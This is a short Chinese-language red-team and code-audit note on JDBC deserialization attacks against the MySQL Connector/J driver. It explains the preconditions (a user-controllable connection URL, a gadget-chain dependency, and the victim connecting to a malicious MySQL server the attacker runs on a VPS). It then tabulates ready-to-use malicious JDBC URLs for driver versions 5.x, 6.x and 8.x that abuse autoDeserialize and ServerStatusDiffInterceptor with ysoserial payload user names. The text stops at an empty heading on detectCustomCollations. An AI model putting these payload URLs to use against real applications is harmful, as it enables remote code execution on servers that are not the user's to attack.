#代码审计 #redteam
### JDBC
>JDBC（Java DataBase Connectivity，java数据库连接）是⼀种⽤于执⾏Sql语句的Java Api，可以为多种关系数据库提供统⼀访问，它由⼀组⽤Java语⾔编写的类和接⼝组成。是Java访问数据库的标准规范。简单理解为链接数据库、对数据库操作都需要通过jdbc来实现  

```java
jdbc:mysql://127.0.0.1:3306/db?user=root&pass=root
```


### JDBC 反序列化
>Jdbc反序列化是指在jdbc中url连接⽤户可控的前提下，进⾏反序列化的操作


### 快速审计

1. url可控
2. 引入反序列化链漏洞的依赖（cc链）
3. 被攻击者请求攻击者在vps搭建的恶意mysql服务器，然后进行rce

### ServerStatusDiffInterceptor触发
| 驱动版本                 | JDBC语句                                                                                                                                                       |     |
| -------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------ | --- |
| 6.x                  | jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc |     |
| 8.x                  | jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc     |     |
| 5.11及以上的5.x<br>版本    | jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc    |     |
| 5.1.10及以下<br>5.1.x版本 | 同上，但是需要连接后执⾏查询                                                                                                                                               |     |
| 5.0.x                | 还没有ServerStatusDiffInterceptor                                                                                                                               |     |


### detectCustomCollations触发
